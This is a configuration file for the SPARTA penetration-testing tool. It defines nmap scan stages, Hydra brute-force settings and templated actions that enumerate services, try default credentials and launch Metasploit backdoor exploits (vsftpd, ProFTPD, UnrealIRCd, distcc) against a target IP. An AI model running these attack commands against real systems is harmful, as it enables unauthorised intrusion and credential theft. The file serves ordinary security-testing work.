-
Notifications
You must be signed in to change notification settings - Fork 0
/
sparta.conf
executable file
·273 lines (264 loc) · 32.4 KB
/
sparta.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
/usr/share/sniper/loot
[GeneralSettings]
default-terminal=gnome-terminal
tool-output-black-background=False
screenshooter-timeout=15000
web-services="http,https,ssl,soap,http-proxy,http-alt,https-alt"
enable-scheduler=True
enable-scheduler-on-import=False
max-fast-processes=10
max-slow-processes=10
[BruteSettings]
store-cleartext-passwords-on-exit=True
username-wordlist-path=/usr/share/wordlists/
password-wordlist-path=/usr/share/wordlists/
default-username=root
default-password=password
services="asterisk,afp,cisco,cisco-enable,cvs,firebird,ftp,ftps,http-head,http-get,https-head,https-get,http-get-form,http-post-form,https-get-form,https-post-form,http-proxy,http-proxy-urlenum,icq,imap,imaps,irc,ldap2,ldap2s,ldap3,ldap3s,ldap3-crammd5,ldap3-crammd5s,ldap3-digestmd5,ldap3-digestmd5s,msrpc,mssql,mysql,ncp,nntp,oracle-listener,oracle-sid,pcanywhere,pcnfs,pop3,pop3s,postgres,rdp,rexec,rlogin,rsh,s7-300,sip,smb,smtp,smtps,smtp-enum,snmp,socks5,ssh,sshkey,svn,teamspeak,telnet,telnets,vmauthd,vnc,xmpp"
no-username-services="cisco,cisco-enable,oracle-listener,s7-300,snmp,vnc"
no-password-services="oracle-sid,rsh,smtp-enum"
[StagedNmapSettings]
stage1-ports="T:80,443"
stage2-ports="T:25,135,137,139,445,1433,3306,5432,U:137,161,162,1434"
stage3-ports="T:23,21,22,110,111,2049,3389,8080,U:500,5060"
stage4-ports="T:0-20,24,26-79,81-109,112-134,136,138,140-442,444,446-1432,1434-2048,2050-3305,3307-3388,3390-5431,5433-8079,8081-29999"
stage5-ports=T:30000-65535
[ToolSettings]
nmap-path=/usr/bin/nmap
hydra-path=/usr/bin/hydra
cutycapt-path=/usr/bin/cutycapt
texteditor-path=/usr/bin/leafpad
[HostActions]
ciscoTorch=Run cisco-torch, bash -c \"cisco-torch -A [IP] | tee /usr/share/sniper/loot/notes/ciscoTorch_[IP]_$(date +'%FT%H%M%S%3N').txt\"
nmap-fast-tcp=Run nmap (fast TCP), nmap -Pn -F -T4 -vvvv [IP] -oX /usr/share/sniper/loot/nmap/nmapFastTCP[PORT]-[IP].xml
searchsploitFastTCP=Run searchsploit (fast TCP), bash -c \"searchsploit -v -o --nmap /usr/share/sniper/loot/nmap/nmapFastTCP[PORT]-[IP].xml | tr -d \"'\" | tr -d '\"' | tee /usr/share/sniper/loot/notes/nmapSearchSploit-[IP]-[PORT].txt\"
nmap-full-tcp=Run nmap (full TCP), nmap -Pn -sV -sC -O -p- -T4 -vvvvv [IP] -oA \"[OUTPUT]\"
nmap-fast-udp=Run nmap (fast UDP), "nmap -n -Pn -sU -F --min-rate=1000 -vvvvv [IP] -oA \"[OUTPUT]\""
nmap-udp-1000=Run nmap (top 1000 quick UDP), "nmap -n -Pn -sU --min-rate=1000 -vvvvv [IP] -oA \"[OUTPUT]\""
nmap-full-udp=Run nmap (full UDP), nmap -n -Pn -sU -p- -T4 -vvvvv [IP] -oA \"[OUTPUT]\"
unicornscan-full-udp=Run unicornscan (full UDP), unicornscan -mU -Ir 1000 [IP]:a -v
[PortActions]
amt-soap-http_a=Run amap for amt-soap, bash -c \"amap [IP] [PORT] -A | tee /usr/share/sniper/loot/notes/Sparta_amap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "amt-soap-http"
amt-soap-http_n=Run nmap for amt-soap, bash -c \"nmap -A -sV -Pn -T4 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[PORT]-[IP]_$(date +'%FT%H%M%S%3N')_out.xml | tee /usr/share/sniper/loot/notes/Sparta_amtNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "amt-soap-http"
asfAmap=Run amap against asf, bash -c \"amap [IP] [PORT] -A | tee /usr/share/sniper/loot/notes/Sparta_amapAsf_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "oob-ws-http,asf-rmcp,cryptoadmin"
asfNmap=Run nmap against asf, bash -c \"nmap -A -sV -Pn -T4 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_asfNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "oob-ws-http,asf-rmcp,cryptoadmin"
banner=Grab banner, bash -c \"echo '' | nc -v -n -w1 [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_banner_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\",
ccproxy-ftpMeta=Run metasploit on ccproxy, bash -c \"msfconsole -x 'use exploit/unix/ftp/vsftpd_234_backdoor\; setg RHOSTS [IP]\; setg RHOST [IP]\; setg PORT [PORT]\; run\; use unix/ftp/proftpd_133c_backdoor\; run\; exit\;' | tee /usr/share/sniper/loot/notes/Sparta_ccproxy_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "ccproxy-ftp"
ccproxy-ftpNmap=Run nmap on ccproxy, bash -c \"nmap -A -sV -Pn -T4 --script=ftp* -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_ccproxyNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "ccproxy-ftp"
couchdbMeta=Run metasploit on couchdb, bash -c \"msfconsole -x 'use auxiliary/scanner/couchdb/couchdb_enum\; set RHOST [IP]\; setg PORT [PORT]\; run\; exit\;' | tee /usr/share/sniper/loot/notes/Sparta_couchdb_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "couchdb"
couchdbNmap=Run nmap on couchdb, bash -c \"nmap -A -sV -Pn -T4 --script=couchdb* -p [PORT] [IP] --oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_couchdb_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "couchdb"
dirbuster=Launch dirbuster, bash -c \"java -Xmx256M -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -H -l /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://[IP]:[PORT]/ | tee /usr/share/sniper/loot/notes/Sparta_dirbuster_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
distccdMeta=Run metasploit on distcc, bash -c \"msfconsole -x 'use unix/misc/distcc_exec\; setg RHOST [IP]\; setg RHOSTS [IP]\; setg PORT [PORT]\; run\; exit\;' | tee /usr/share/sniper/loot/notes/Sparta_distccdMeta_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "distccd,distcc"
distccdNmap=Run nmap on distcc, bash -c \"nmap -A -sV -Pn -T4 --script=distcc-* -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_distccdNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "distccd,distcc"
domainNmap=Run nmap against domain, bash -c \"nmap -A -sU -sV -Pn -T4 --script=dns* -p U:[PORT],T:[PORT] [IP] -oX usr/share/sniper/loot/nmap/nmap[PORT]-[IP].xml | tee /usr/share/sniper/loot/notes/Sparta_domain_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "domain"
dyna-accessNmap=Run nmap on dyna-accsss, bash -c \"nmap -A -p [PORT] -Pn -T4 -sV --script clamav-exec [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_dyna_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "dyna-access"
enum4linux=Run enum4linux, bash -c \"enum4linux [IP] | tee /usr/share/sniper/loot/notes/Sparta_enum4linux_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "netbios-ssn,microsoft-ds"
execNmap=Run nmap against exec, bash -c \"nmap -A -sV -Pn -T4 -p [PORT] --script=rexec* [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_execNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "exec,biff"
finger=Enumerate users (finger), bash -c \"./scripts/fingertool.sh [IP] | tee /usr/share/sniper/loot/notes/Sparta_finger_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", finger
fingerNmap=Run nmap against finger, bash -c \"nmap -A -sV -Pn -T4 --script=finger* -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_fingerNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "finger"
ftp-default=Check for default ftp credentials, bash -c \"hydra -s [PORT] -C ./wordlists/ftp-default-userpass.txt -u -f [IP] ftp | tee /usr/share/sniper/loot/notes/Sparta_ftp_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", ftp
ftpMeta=Run metasploit against ftp, bash -c \"msfconsole -x 'use exploit/unix/ftp/vsftpd_234_backdoor\; setg RHOST [IP]\; setg RHOSTS [IP]\; setg PORT [PORT]\; run\; use unix/ftp/proftpd_133c_backdoor\; run\; exit\;' | tee /usr/share/sniper/loot/notes/Sparta_ftpMeta_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "ftp"
ftpNmap=Run nmap against ftp, bash -c \"nmap -A -sV -Pn -sC -T4 -p [PORT] --script=ftp-* [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_ftpNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "ftp"
ircMeta=Run metasploit on irc, bash -c \"msfconsole -x 'use unix/irc/unreal_ircd_3281_backdoor\; setg RHOST [IP]\; setg RHOSTS [IP]\; setg PORT [PORT]\; run\; exit\;' | tee /usr/share/sniper/loot/notes/Sparta_ircMeta_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "irc,ircu"
ircNmap=Run nmap on irc, bash -c \"nmap -A -sV -Pn -T4 --script=irc* -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_ircNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "irc,ircu"
ldapNmap=Run nmap against ldap, bash -c \"nmap -A -p [PORT] -Pn -T4 --script=ldap* [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_ldapNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "ldap"
ldapsearch=Run ldapsearch, bash -c \"ldapsearch -h [IP] -p [PORT] -x -s base | tee /usr/share/sniper/loot/notes/Sparta_ldapsearch_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", ldap
loginNmap=Run nmap against login, bash -c \"nmap -A -sV -T4 -Pn -p [PORT] --script=rlogin* [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_loginNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "login,who"
mongodb=Run check for mongodb, bash -c \"nmap -sV -p [PORT] -Pn -T4 --script=mongodb* [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_mongoNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "mongod"
ms-sql-sNmap=Run nmap against ms-sql-s, bash -c \"nmap -A -sV -Pn -T4 --script=ms-sql* -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_mssqlNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "ms-sql-s"
ms-wbt-server=Run rdesktop on ms-wbt-server, bash -c \"rdesktop [IP] | tee /usr/share/sniper/loot/notes/Sparta_rdesktop_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\","ms-wbt-server"
ms-wbt-serverNmap=Run nmap on ms-wbt-server, bash -c \"nmap -A -sV -Pn -T4 --script=rdp-* -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_rdesktopNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "ms-wbt-server"
msRPC=Run rpcinfo against rcp, bash -c \"rpcinfo -p [IP] | tee /usr/share/sniper/loot/notes/Sparta_rpcinfo_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "msrpc"
msrpcNmap=Run nmap against msrpc, bash -c \"nmap -A -p [PORT] -T4 --script=rpc* [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_msrpcNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "msrpc"
mssql-default=Check for default mssql credentials, bash -c \"hydra -s [PORT] -C ./wordlists/mssql-default-userpass.txt -u -f [IP] mssql | tee /usr/share/sniper/loot/notes/Sparta_mysqlsHydra_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", ms-sql-s
mysql-default=Check for default mysql credentials, bash -c \"hydra -s [PORT] -C ./wordlists/mysql-default-userpass.txt -u -f [IP] mysql | tee /usr/share/sniper/loot/notes/Sparta_mysqlHydra_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", mysql
nbtscan=Run nbtscan, bash -c \"nbtscan -v -h [IP] | tee /usr/share/sniper/loot/notes/Sparta_nbtscan_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", netbios-ns
ndmp=Run msfconsole for ndmp, bash -c \"msfconsole -x 'use auxiliary/admin/webmin/file_disclosure\; setg RHOST [IP]\; setg RHOSTS [IP]\; setg PORT [PORT]\; run\; exit\;' | tee /usr/share/sniper/loot/notes/Sparta_ndmpWebminMeta_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "ndmp,snet-sensor-mgmt"
nmap=Run nmap (scripts) on port, bash -c \"nmap -Pn -sV -sC -vvvvv -p[PORT] [IP] | tee /usr/share/sniper/loot/notes/Sparta_nmapSparta_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", ""
oracle-default=Check for default oracle credentials, bash -c \"hydra -s [PORT] -C ./wordlists/oracle-default-userpass.txt -u -f [IP] oracle-listener | tee /usr/share/sniper/loot/notes/Sparta_oracleHydra_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", oracle-tns
oracle-sid=Oracle SID enumeration, bash -c \"'msfcli auxiliary/scanner/oracle/sid_enum rhosts=[IP] E' | tee /usr/share/sniper/loot/notes/Sparta_oracleMetaSID_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", oracle-tns
oracle-version=Get version, bash -c \"'msfcli auxiliary/scanner/oracle/tnslsnr_version rhosts=[IP] E' | tee /usr/share/sniper/loot/notes/Sparta_oracleMetaVer_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", oracle-tns
pharosNmap=Run nmap on pharos, bash -c \"nmap -sV -Pn -A -p 4443 -T4 --script=*proxy* [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_pharosNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "pharos"
polenum=Extract password policy (polenum), bash -c \"polenum [IP] | tee /usr/share/sniper/loot/notes/Sparta_polenum_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "netbios-ssn,microsoft-ds"
pop3Nmap=Run nmap against pop3, bash -c \"nmap -A -sV -T4 --script=pop* -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_pop3Nmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "pop3"
postgres-default=Check for default postgres credentials, bash -c \"hydra -s [PORT] -C ./wordlists/postgres-default-userpass.txt -u -f [IP] postgres | tee /usr/share/sniper/loot/notes/Sparta_postgresHydra_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", postgresql
postgresqlNmap=Run nmap on postgresql, bash -c \"nmap -A -sV -Pn --script=pgsql-brute -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_postgresNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "postgresql"
rdp-sec-check=Run rdp-sec-check.pl, bash -c \"perl ./scripts/rdp-sec-check.pl [IP]:[PORT] | tee /usr/share/sniper/loot/notes/Sparta_rdpPerl_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", ms-wbt-server
rpcinfo=Run rpcinfo, bash -c \"rpcinfo -p [IP] | tee /usr/share/sniper/loot/notes/Sparta_rpcinfo_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", rpcbind
rwho=Run rwho, bash -c \"rwho -a [IP] | tee /usr/share/sniper/loot/notes/Sparta_rwho_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", who
samrdump=Run samrdump, bash -c \"python /usr/share/sniper/bin/samrdump.py [IP] [PORT]/SMB | tee /usr/share/sniper/loot/notes/Sparta_samrdump_[IP]_[PORT]_out.txt\", "netbios-ssn,microsoft-ds"
shellAmap=Run amap against shell, bash -c \"amap [IP] [PORT] -A | tee /usr/share/sniper/loot/notes/Sparta_shellAmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "shell,syslog"
showmount=Show nfs shares, bash -c \"showmount -e [IP] | tee /usr/share/sniper/loot/notes/Sparta_showmount_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", nfs
smartInstall=Run check for cisco smart-install, bash -c \"/usr/share/sparta/scripts/smi_check.py -i [IP] -p [PORT] | tee /usr/share/sniper/loot/notes/ciscoSmartInstall_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "smart-install"
smb-enum-admins=Enumerate domain admins (net), bash -c \"net rpc group members 'Domain Admins' -I [IP] -U% | tee /usr/share/sniper/loot/notes/Sparta_smbEnumDomAdm_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "netbios-ssn,microsoft-ds"
smb-enum-groups=Enumerate groups (nmap), bash -c \"nmap -p[PORT] --script=smb-enum-groups [IP] -vvvvv | tee /usr/share/sniper/loot/notes/Sparta_smbEnumGroup_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "netbios-ssn,microsoft-ds"
smb-enum-policies=Extract password policy (nmap), bash -c \"nmap -p[PORT] --script=smb-enum-domains [IP] -vvvvv | tee /usr/share/sniper/loot/notes/Sparta_smbEnumPolicy_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "netbios-ssn,microsoft-ds"
smb-enum-sessions=Enumerate logged in users (nmap), bash -c \"nmap -p[PORT] --script=smb-enum-sessions [IP] -vvvvv | tee /usr/share/sniper/loot/notes/Sparta_smbEnumLoggedInUsersNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "netbios-ssn,microsoft-ds"
smb-enum-shares=Enumerate shares (nmap), bash -c \"nmap -p[PORT] --script=smb-enum-shares [IP] -vvvvv | tee /usr/share/sniper/loot/notes/Sparta_smbEnumShares_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "netbios-ssn,microsoft-ds"
smb-enum-users-rpc=Enumerate users (rpcclient), bash -c \"echo 'enumdomusers' | rpcclient [IP] -U% | tee /usr/share/sniper/loot/notes/Sparta_smbEnumUsersRPC_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "netbios-ssn,microsoft-ds"
smb-enum-users=Enumerate users (nmap), bash -c \"nmap -p[PORT] --script=smb-enum-users [IP] -vvvvv | tee /usr/share/sniper/loot/notes/Sparta_smbEnumUsersNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "netbios-ssn,microsoft-ds"
smb-null-sessions=Check for null sessions (rpcclient), bash -c \"echo 'srvinfo' | rpcclient [IP] -U% | tee /usr/share/sniper/loot/notes/Sparta_smbEnumNullRPC_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "netbios-ssn,microsoft-ds"
smbenum=Run smbenum, bash -c \"./scripts/smbenum.sh [IP] | tee /usr/share/sniper/loot/notes/Sparta_smbEnumScript_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "netbios-ssn,microsoft-ds"
smtp-enum-expn=Enumerate SMTP users (EXPN), bash -c \"smtp-user-enum -M EXPN -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t [IP] -p [PORT] | tee /usr/share/sniper/loot/notes/Sparta_smtpExpn_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", smtp
smtp-enum-rcpt=Enumerate SMTP users (RCPT), bash -c \"smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t [IP] -p [PORT] | tee /usr/share/sniper/loot/notes/Sparta_smtpRcpt_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", smtp
smtp-enum-vrfy=Enumerate SMTP users (VRFY), bash -c \"smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t [IP] -p [PORT] | tee /usr/share/sniper/loot/notes/Sparta_smtpVrfy_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", smtp
smtpMeta=Run metasploit against smtp, bash -c \"msfconsole -x 'use scanner/smtp/smtp_enum\; setg RHOSTS [IP]\; setg RHOST [IP]\; setg PORT [PORT]\; run\; exit\;' | tee /usr/share/sniper/loot/notes/Sparta_smtpMeta_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "smtp"
smtpNmap=Run nmap against smtp, bash -c \"nmap -A -sV -Pn -T4 --script=smtp* -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_smtpNmap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "smtp"
snet-sensor-mgmt=Run msfconsole for ndmp, bash -c \"msfconsole -x 'use auxiliary/admin/webmin/file_disclosure\; setg RHOST [IP]\; setg RHOSTS [IP]\; setg PORT [PORT]\; run\; exit\;' | tee /usr/share/sniper/loot/notes/Sparta_snetMeta_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "ndmp,snet-sensor-mgmt"
sniperArachni=Run arachni, bash -c \"/usr/share/sparta/scripts/sniper_arachni.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_arachni_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
sniperCmsmap=Run sniper cmsmap, bash -c \"/usr/share/sparta/scripts/sniper_cmsmap.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_cmsMap_[IP]_[PORT]_$(date +'%FT%H%M%S%3N')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
sniperCurl=Run sniper curl script, bash -c \"/usr/share/sparta/scripts/sniper_curl.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_curl_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
sniperDirb=Run sniper irb, bash -c \"/usr/share/sparta/scripts/sniper_dirb.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_dirb_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
sniperFourfourthree=Run 443 scans, bash -c \"/usr/share/sparta/scripts/sniper_443scans.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_443_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "https"
sniperJakarta=Run sniper for jakarta, bash -c \"/usr/share/sparta/scripts/sniper_jakarta.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_jakarta_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
sniperMassbleed=Run sniper massbleed, bash -c \"/usr/share/sparta/scripts/sniper_massbleed.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_massbleed_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "https"
sniperNikto=Run sniper nikto, bash -c \"/usr/share/sparta/scripts/sniper_nikto.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_nikto_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
sniperNetbios=Run sniper against netbios, bash -c \"/usr/share/sparta/scripts/sniper_netbios.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_netbios_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "netbios-ssn,microsoft-ds"
sniperNFS=Run sniper against nfs, bash -c \"/usr/share/sparta/scripts/sniper_nfs.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_nfs_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "nfs"
sniperNmaphttp=Run sniper nmap http, bash -c \"/usr/share/sparta/scripts/sniper_nmap_http_scripts.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_httpNmap_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
sniperPhpmyadmin=Run check for phpMyAdmin, bash -c \"/usr/share/sparta/scripts/sniper_phpmyadmin.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_phpMyadmin_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
sniperRmiregistry=Run sniper against rmiregistry, bash -c \"/usr/share/sparta/scripts/sniper_rmiRegistry.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_rmireg_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "rmiregistry"
sniperRpcbind=Run sniper against rpcbind, bash -c \"/usr/share/sparta/scripts/sniper_snmp.sh [IP] [PORT]| tee /usr/share/sniper/loot/notes/Sparta_sniper_rpcbind_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "rpcbind"
sniperShellshock=Run check for shellshock, bash -c \"/usr/share/sparta/scripts/sniper_shellshock.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_shellshock_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
sniperSnmp=Run sniper against snmp, bash -c \"/usr/share/sparta/scripts/sniper_snmp.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_snmp_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "snmp,snmptrap"
